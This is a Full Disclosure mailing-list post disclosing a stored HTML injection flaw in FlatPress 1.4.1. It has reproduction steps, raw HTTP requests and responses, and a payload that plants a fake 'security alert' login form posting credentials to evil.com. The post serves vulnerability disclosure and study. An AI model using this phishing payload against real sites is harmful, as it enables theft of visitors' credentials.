Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Stored HTML Injection - flatpressv1.4.1

From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 21 Sep 2025 17:31:27 +0100
# Exploit Title: Stored HTML Injection - flatpressv1.4.1
# Date: 09/2025
# Exploit Author: Andrey Stoykov
# Version: 1.4.1
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/09/friday-fun-pentest-series-41-stored.html


Stored HTML Injection:

Steps to Reproduce:

- Login with admin user and visit "Main" > "New Entry" > "Write Entry" and
in the description enter the payload  "[html]<div style="border:2px solid
red;padding:20px;margin:20px;background:yellow"><h2>SECURITY
ALERT</h2><p>Your account has been compromised. Please login
again:</p><form action="https://evil.com/steal";><input type="text"
placeholder="Username"><input type="password"
placeholder="Password"><button>Login</button></form></div>[/html]"


// HTTP POST Request

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1
Host: demos5.softaculous.com
Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0)
Gecko/20100101 Firefox/144.0
[...]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=--
Selection --&imageselect=-- Selection --&content=[html]<div
style="border:2px solid
red;padding:20px;margin:20px;background:yellow"><h2>SECURITY
ALERT</h2><p>Your account has been compromised. Please login
again:</p><form action="https://evil.com/steal";><input type="text"
placeholder="Username"><input type="password"
placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 21 Sep 2025 16:12:55 GMT
Server: FlatPress
[...]


// HTTP GET Request

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1
Host: demos5.softaculous.com
Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0)
Gecko/20100101 Firefox/144.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 16:12:58 GMT
Server: FlatPress
[...]

[...]
<div itemprop="articleBody"><p><div style="border:2px solid
red;padding:20px;margin:20px;background:yellow"><h2>SECURITY
ALERT</h2><p>Your account has been compromised. Please login
again:</p><form action="https://evil.com/steal";><input type="text"
placeholder="Username"><input type="password"
placeholder="Password"><button>Login</button></form></div></p></div>
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: